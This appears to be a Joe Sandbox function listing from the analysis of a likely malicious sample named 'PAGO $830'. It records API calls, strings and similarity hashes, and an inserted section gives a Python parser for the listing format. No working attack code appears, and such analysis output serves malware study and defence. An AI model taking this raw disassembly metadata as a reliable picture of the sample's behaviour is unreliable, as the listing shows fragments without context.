                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: _wcslen$BuffCharUpper
                                                          • String ID: APPEND$EXISTS$KEYS$REMOVE
                                                          • API String ID: 1256254125-769500911
                                                          • Opcode ID: ee5c81a4ba574229104901a4825b3aa306afcb328452e5b1b8125f6b768db39c
                                                          • Instruction ID: bc98a6abbfd3347142ee31d73c8d79628be6fd8def2bc4f7a4f769a6c73387d9
                                                          • Opcode Fuzzy Hash: ee5c81a4ba574229104901a4825b3aa306afcb328452e5b1b8125f6b768db39c
                                                          • Instruction Fuzzy Hash: 9841D932A00126DACB105F7D88515BE77A5BF617BCB69422BE465DB384EB31CD81C7B0
                                                          APIs
                                                          • SetErrorMode.KERNEL32(00000001), ref: 00DE52BE
                                                          • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 00DE5334
                                                          • GetLastError.KERNEL32 ref: 00DE533E
                                                          • SetErrorMode.KERNEL32(00000000,READY), ref: 00DE53C5
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                          • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: Error$Mode$DiskFreeLastSpace
                                                          • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                                          • API String ID: 4194297153-14809454
                                                          • Opcode ID: 90054bd90b1f14c81151babd9d7c6007202b7a59c286d07a77bb02e03b6f9194
                                                          • Instruction ID: 8f1ba385f873d836272fb12c0d48c1eea16b9f4c63e0a0630bf9d3f79a1ec0d5
                                                          • Opcode Fuzzy Hash: 90054bd90b1f14c81151babd9d7c6007202b7a59c286d07a77bb02e03b6f9194
                                                          • Instruction Fuzzy Hash: F931E535A006459FCB10EF6AD884BAEBBB4EF44388F188095E405DB396D7B1DD46CBB0
                                                          APIs
                                                          • CreateMenu.USER32 ref: 00E03BAC
                                                          • SetMenu.USER32(?,00000000), ref: 00E03BBB
                                                          • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00E03C43
                                                          • IsMenu.USER32(?), ref: 00E03C57
                                                          • CreatePopupMenu.USER32 ref: 00E03C61
                                                          • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00E03C8E
                                                          • DrawMenuBar.USER32 ref: 00E03C96
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                          • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: Menu$CreateItem$DrawInfoInsertPopup
                                                          • String ID: 0$F
                                                          • API String ID: 161812096-3044882817
                                                          • Opcode ID: 16099ad8eef4707d4282d8fd45147afc83e002344eee5157960509c8031c5a17
                                                          • Instruction ID: ac582606ba2db470aedb938241d37360a0703064186736992601b4ed4335dc28
                                                          • Opcode Fuzzy Hash: 16099ad8eef4707d4282d8fd45147afc83e002344eee5157960509c8031c5a17
                                                          • Instruction Fuzzy Hash: 2E416C78601209AFEF14CF65D884EAABBB9FF49314F140129F945B7390D731AA54CF60
                                                          APIs
                                                          • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00E039D0
                                                          • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00E039D3
                                                          • GetWindowLongW.USER32(?,000000F0), ref: 00E039FA
                                                          • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00E03A1D
                                                          • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00E03A95
                                                          • SendMessageW.USER32(?,00001074,00000000,00000007), ref: 00E03ADF
                                                          • SendMessageW.USER32(?,00001057,00000000,00000000), ref: 00E03AFA
                                                          • SendMessageW.USER32(?,0000101D,00001004,00000000), ref: 00E03B15
                                                          • SendMessageW.USER32(?,0000101E,00001004,00000000), ref: 00E03B29
                                                          • SendMessageW.USER32(?,00001008,00000000,00000007), ref: 00E03B46
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                          • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$LongWindow
                                                          • String ID:
                                                          • API String ID: 312131281-0
                                                          • Opcode ID: 44876a94f0040a0c035b071c0b5fb17f9fcdf523beed71082f956367b72d35d7
                                                          • Instruction ID: 0a597090f7f02e0c1fc5a21fa20a5d6ea191e471a15d090bf1f53c71b1b0da00
                                                          • Opcode Fuzzy Hash: 44876a94f0040a0c035b071c0b5fb17f9fcdf523beed71082f956367b72d35d7
                                                          • Instruction Fuzzy Hash: E3614975900248AFDB20DFA8CC81EEE77B8EB49714F100199FA15A72E1D771AE85DF50
                                                          APIs
                                                          • GetCurrentThreadId.KERNEL32 ref: 00DDB06F
                                                          • GetForegroundWindow.USER32(00000000,?,?,?,?,?,00DDA0FF,?,00000001), ref: 00DDB083
                                                          • GetWindowThreadProcessId.USER32(00000000), ref: 00DDB08A
                                                          • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00DDA0FF,?,00000001), ref: 00DDB099
                                                          • GetWindowThreadProcessId.USER32(?,00000000), ref: 00DDB0AB
                                                          • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00DDA0FF,?,00000001), ref: 00DDB0C4
                                                          • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00DDA0FF,?,00000001), ref: 00DDB0D6
                                                          • AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,00DDA0FF,?,00000001), ref: 00DDB11B
                                                          • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,00DDA0FF,?,00000001), ref: 00DDB130
                                                          • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,00DDA0FF,?,00000001), ref: 00DDB13B
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                          • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                                          • String ID:
                                                          • API String ID: 2156557900-0
                                                          • Opcode ID: cd795e6466241c2ad7dcf09ca293a29ab491b3e3aec7dd6596e193d0033c03ed
                                                          • Instruction ID: 5d6a3e495f4a4d1e28429b870db73cf215656ede4888ce80f12967c920a42125
                                                          • Opcode Fuzzy Hash: cd795e6466241c2ad7dcf09ca293a29ab491b3e3aec7dd6596e193d0033c03ed
                                                          • Instruction Fuzzy Hash: E431DF75600301EFDB20DF26DC54B6A37B8AB06765FA6410BFA01F6390D3B69C898B74
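The function entries in this listing (for example the LoadStringW, GetDiskFreeSpaceW and AttachThreadInput blocks above) all follow one fixed layout: an "APIs" section whose bullets are either "Name.MODULE ref: ADDR", "Name.MODULE(args), ref: ADDR" or a "Part of subcall function CALLEE:" prefixed form, followed by "Key: value" bullets under Memory Dump Source and Similarity, where the String ID value joins the referenced strings with "$". Reading several thousand such lines by eye is impractical; the parser below turns them into records you can query. It is an added example, not Joe Sandbox's own code or output format documentation: it assumes only the bullet shapes visible on this page, and its sample input is a constructed excerpt transcribed and trimmed from the entries above.

```python
"""Parser for the per-function "APIs" / "Similarity" blocks of a Joe Sandbox
function listing (the entry format on this page). Added example, not Joe Sandbox code."""
import re
from dataclasses import dataclass, field
from typing import Dict, List, Optional

SECTION_HEADERS = {"APIs", "Strings", "Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity"}
# "APIs" bullets come in three shapes: "Name.MODULE ref: ADDR", "Name.MODULE(args), ref: ADDR",
# and "Part of subcall function CALLEE: Name.MODULE(args), ref: ADDR".
API_RE = re.compile(
    r"^•\s*(?:Part of subcall function\s+(?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<name>[A-Za-z_]\w*)\.(?P<module>\w+)"
    r"(?:\((?P<args>.*?)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)$")
# "Key: value" bullets of the other sections (Source File, API ID, String ID, Opcode ID, ...).
KV_RE = re.compile(r"^•\s*(?P<key>[A-Za-z ]+?):\s*(?P<val>.*)$")

@dataclass
class ApiCall:
    name: str
    module: str
    args: List[str]
    ref: int                    # call-site address
    subcall_of: Optional[int]   # callee address when the call happens inside a subroutine

@dataclass
class FunctionRecord:
    calls: List[ApiCall] = field(default_factory=list)
    meta: Dict[str, str] = field(default_factory=dict)   # "Key: value" bullets by key
    unparsed: List[str] = field(default_factory=list)   # bullets neither regex accepted

    def strings(self) -> List[str]:
        # The listing joins referenced strings with "$"; a literal "$" is ambiguous here.
        return [s for s in self.meta.get("String ID", "").split("$") if s]

    def api_names(self, include_subcalls: bool = False) -> List[str]:
        return [c.name for c in self.calls if include_subcalls or c.subcall_of is None]

def parse_listing(text: str) -> List[FunctionRecord]:
    """One record per function block; each block opens at its "APIs" header."""
    records: List[FunctionRecord] = []
    current, section = None, None
    for line in filter(None, map(str.strip, text.splitlines())):
        if line in SECTION_HEADERS:
            if line == "APIs":
                current = FunctionRecord()
                records.append(current)
            section = line
        elif current is None:          # tail of a block cut off above the excerpt
            pass
        elif section == "APIs":
            m = API_RE.match(line)
            if not m:
                current.unparsed.append(line)
                continue
            args, sub = m.group("args"), m.group("sub")
            current.calls.append(ApiCall(m.group("name"), m.group("module"),
                                         args.split(",") if args else [],
                                         int(m.group("ref"), 16), int(sub, 16) if sub else None))
        else:
            m = KV_RE.match(line)
            if m and m.group("key") != "Associated":     # skip the repeated dump-file links
                current.meta[m.group("key")] = m.group("val").strip()
    return records

def functions_calling(records: List[FunctionRecord], *names: str,
                      include_subcalls: bool = False) -> List[FunctionRecord]:
    """Records whose call list contains every named API: the triage query to run over a
    several-thousand-line listing instead of scrolling it."""
    return [r for r in records if set(names) <= set(r.api_names(include_subcalls))]

# Constructed sample: three entries transcribed from this page's listing, trimmed.
SAMPLE = """\
APIs
• GetCurrentThreadId.KERNEL32 ref: 00DDB06F
• GetForegroundWindow.USER32(00000000,?,?,?,?,?,00DDA0FF,?,00000001), ref: 00DDB083
• AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00DDA0FF,?,00000001), ref: 00DDB099
Similarity
• API ID: Thread$AttachInput$Window$Process$CurrentForeground
• String ID:
• Opcode ID: cd795e6466241c2ad7dcf09ca293a29ab491b3e3aec7dd6596e193d0033c03ed
APIs
• LoadStringW.USER32(00000066,?,00000FFF), ref: 00DE32ED
  • Part of subcall function 00D7B606: _wcslen.LIBCMT ref: 00D7B610
• LoadStringW.USER32(00000072,?,00000FFF,?), ref: 00DE330E
Similarity
• String ID: Error: $"%s" (%d) : ==> %s:$Line %d (File "%s"):$^ ERROR
APIs
• SetErrorMode.KERNEL32(00000001), ref: 00DE52BE
• GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 00DE5334
• SetErrorMode.KERNEL32(00000000,READY), ref: 00DE53C5
Similarity
• String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
"""

if __name__ == "__main__":
    for r in functions_calling(parse_listing(SAMPLE), "AttachThreadInput", "GetForegroundWindow"):
        print(r.meta["Opcode ID"][:16], " -> ".join(r.api_names()))
```

Run against a full export, check that every record's `unparsed` list is empty before trusting any counts; a non-empty list means the export contains a bullet shape this page does not show. Subcall bullets are excluded from `api_names()` by default because they describe a callee's imports, not the function's own, and counting them twice inflates per-function API totals.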
                                                          APIs
                                                          • _free.LIBCMT ref: 00DA2C24
                                                            • Part of subcall function 00DA2958: RtlFreeHeap.NTDLL(00000000,00000000,?,00DAD771,00000000,00000000,00000000,00000000,?,00DAD798,00000000,00000007,00000000,?,00DADB95,00000000), ref: 00DA296E
                                                            • Part of subcall function 00DA2958: GetLastError.KERNEL32(00000000,?,00DAD771,00000000,00000000,00000000,00000000,?,00DAD798,00000000,00000007,00000000,?,00DADB95,00000000,00000000), ref: 00DA2980
                                                          • _free.LIBCMT ref: 00DA2C30
                                                          • _free.LIBCMT ref: 00DA2C3B
                                                          • _free.LIBCMT ref: 00DA2C46
                                                          • _free.LIBCMT ref: 00DA2C51
                                                          • _free.LIBCMT ref: 00DA2C5C
                                                          • _free.LIBCMT ref: 00DA2C67
                                                          • _free.LIBCMT ref: 00DA2C72
                                                          • _free.LIBCMT ref: 00DA2C7D
                                                          • _free.LIBCMT ref: 00DA2C8B
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                          • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: _free$ErrorFreeHeapLast
                                                          • String ID:
                                                          • API String ID: 776569668-0
                                                          • Opcode ID: c769fd2f407ea7d71d2337645a3ed6abcb72dc958cc9b0d6afe07830be74fa93
                                                          • Instruction ID: 2866da13c6d391d1695bfa54755068ebba7fc4c3312ce5c334e089e570444b1b
                                                          • Opcode Fuzzy Hash: c769fd2f407ea7d71d2337645a3ed6abcb72dc958cc9b0d6afe07830be74fa93
                                                          • Instruction Fuzzy Hash: AD11D476240149BFCB01EF5AC852CEE3BA5FF06750F4140A1BA589B222DA31DA959FA1
                                                          APIs
                                                          • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00D72D64
                                                          • OleUninitialize.OLE32(?,00000000), ref: 00D72E03
                                                          • UnregisterHotKey.USER32(?), ref: 00D72FE8
                                                          • DestroyWindow.USER32(?), ref: 00DB3045
                                                          • FreeLibrary.KERNEL32(?), ref: 00DB30AA
                                                          • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00DB30D7
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                          • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                                                          • String ID: close all
                                                          • API String ID: 469580280-3243417748
                                                          • Opcode ID: fe8edd0023ec4cf80989a5c5a70b213de0ccdb4cebdfcc7be38186b09187a008
                                                          • Instruction ID: 41e25f00f2d589021c6dd1a0c29566752418d00dc49d2d31fe6d1b2d0397d317
                                                          • Opcode Fuzzy Hash: fe8edd0023ec4cf80989a5c5a70b213de0ccdb4cebdfcc7be38186b09187a008
                                                          • Instruction Fuzzy Hash: 1AD14931701212CFCB29EF19C495A69F7A4FF05700F1482ADE94A6B252EB31AD52DFB1
                                                          APIs
                                                          • SetWindowLongW.USER32(?,000000EB), ref: 00D7761A
                                                            • Part of subcall function 00D776AA: GetClientRect.USER32(?,?), ref: 00D776D0
                                                            • Part of subcall function 00D776AA: GetWindowRect.USER32(?,?), ref: 00D77711
                                                            • Part of subcall function 00D776AA: ScreenToClient.USER32(?,?), ref: 00D77739
                                                          • GetDC.USER32 ref: 00DB52A2
                                                          • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 00DB52B5
                                                          • SelectObject.GDI32(00000000,00000000), ref: 00DB52C3
                                                          • SelectObject.GDI32(00000000,00000000), ref: 00DB52D8
                                                          • ReleaseDC.USER32(?,00000000), ref: 00DB52E0
                                                          • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 00DB5371
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                           • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                                                          • String ID: U
                                                          • API String ID: 4009187628-3372436214
                                                          • Opcode ID: d6443fc197fbd2bfda30c5bd6dac6685ce7b13fc35614ca01de44df841a35848
                                                          • Instruction ID: 4ace32522a74ed3bb9218435d2121b82ccc9547f6098e70667dba882d8d59cb9
                                                          • Opcode Fuzzy Hash: d6443fc197fbd2bfda30c5bd6dac6685ce7b13fc35614ca01de44df841a35848
                                                          • Instruction Fuzzy Hash: 0E71AE30404605DFCF228F64D884AEE7BB5FF49350F284669E9966A3AAD771C881DF70
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                           • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: _wcslen
                                                          • String ID: ACTIVE$HANDLE$LAST$REGEXPTITLE
                                                          • API String ID: 176396367-1994484594
                                                          • Opcode ID: 83790d33ea2467072b83eb486bb666abae9a294d23bd5addb566d44a216e7f04
                                                          • Instruction ID: d65be748fa009cd358ef9c642f7f83d2cdee485902f976dd564ffacdd8ddb824
                                                          • Opcode Fuzzy Hash: 83790d33ea2467072b83eb486bb666abae9a294d23bd5addb566d44a216e7f04
                                                          • Instruction Fuzzy Hash: 37512232B003228BCB248E69C98557B77E1BF95714B58462EE881A3780EB30DD49C7B0
                                                          APIs
                                                            • Part of subcall function 00DD3F58: CharUpperBuffW.USER32(?,?,00000000,00E0D0D0,?,?,00000001,?,?,00DD4286,?,?,?,?,00000000,00E0D0D0), ref: 00DD3FE5
                                                          • _wcslen.LIBCMT ref: 00DD4296
                                                          • _wcslen.LIBCMT ref: 00DD42F0
                                                          • _wcslen.LIBCMT ref: 00DD4337
                                                          • _wcslen.LIBCMT ref: 00DD437B
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                           • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: _wcslen$BuffCharUpper
                                                          • String ID: ACTIVE$HANDLE$LAST$REGEXPTITLE
                                                          • API String ID: 1256254125-1994484594
                                                          • Opcode ID: 397eec6abfd53254da327d4523fbfd5f5841493eed85e1bdd71a1802b3155e26
                                                          • Instruction ID: 2e382aca8b606ed2b79f609290a88ec6e986a36efe457ff67080e79221ca5269
                                                          • Opcode Fuzzy Hash: 397eec6abfd53254da327d4523fbfd5f5841493eed85e1bdd71a1802b3155e26
                                                          • Instruction Fuzzy Hash: 0441F032B043128B8B14CE69C8C586BB7E1FF95714BA8462FE885A7740EB30DD09C7B0
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                           • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: _wcslen
                                                          • String ID: ACTIVE$HANDLE$LAST$REGEXPTITLE
                                                          • API String ID: 176396367-1994484594
                                                          • Opcode ID: c0a270b7a8aadf46db47b996b4da547bf7aab42177723642b4716645c7c70ac6
                                                          • Instruction ID: e4a617723d19062dc125ed7e5652b97e156ec87740f708e2727ed3648793c43c
                                                          • Opcode Fuzzy Hash: c0a270b7a8aadf46db47b996b4da547bf7aab42177723642b4716645c7c70ac6
                                                          • Instruction Fuzzy Hash: 93412532B003225B8B248E6DC98543B7791FF95714B68462EE481A7784EB30DD09D3B0
                                                          APIs
                                                            • Part of subcall function 00D73536: _wcslen.LIBCMT ref: 00D73541
                                                            • Part of subcall function 00DD3F58: CharUpperBuffW.USER32(?,?,00000000,00E0D0D0,?,?,00000001,?,?,00DD4286,?,?,?,?,00000000,00E0D0D0), ref: 00DD3FE5
                                                          • _wcslen.LIBCMT ref: 00DD4296
                                                          • _wcslen.LIBCMT ref: 00DD42F0
                                                          • _wcslen.LIBCMT ref: 00DD4337
                                                          • _wcslen.LIBCMT ref: 00DD437B
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                           • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: _wcslen$BuffCharUpper
                                                          • String ID: ACTIVE$HANDLE$LAST$REGEXPTITLE
                                                          • API String ID: 1256254125-1994484594
                                                          • Opcode ID: 4acb5a3a77cf73e1b01f4e643ebd699efccb43e3f9ef21acb5b6ea317c8b24fc
                                                          • Instruction ID: d2d69d2de9780ed5b9a05f259bf931e59d52560a13fe093ea0890102e25ad103
                                                          • Opcode Fuzzy Hash: 4acb5a3a77cf73e1b01f4e643ebd699efccb43e3f9ef21acb5b6ea317c8b24fc
                                                          • Instruction Fuzzy Hash: DB412332B043118B8B14CE69C88143B77A1FF95714BA8462FE885A7740EB30DD09C7B1
                                                          APIs
                                                          • LoadStringW.USER32(00000066,?,00000FFF,?), ref: 00DE3502
                                                            • Part of subcall function 00D7B606: _wcslen.LIBCMT ref: 00D7B610
                                                          • LoadStringW.USER32(?,?,00000FFF,?), ref: 00DE3528
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                           • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: LoadString$_wcslen
                                                          • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                                          • API String ID: 4099089115-2391861430
                                                          • Opcode ID: 88ddb19413bcd7dc5389cab76c961f866953a1c577cd221b14fc4886217fa615
                                                          • Instruction ID: 7d289b80474a23693fd0feeb11966ededb74869c6147cf9d9ed7cdaa70ca4d15
                                                          • Opcode Fuzzy Hash: 88ddb19413bcd7dc5389cab76c961f866953a1c577cd221b14fc4886217fa615
                                                          • Instruction Fuzzy Hash: 2A515A32800249AACF14EFE1DC56EEEBB74EF14310F44816AF519721A2EB715A99DF70
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                           • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
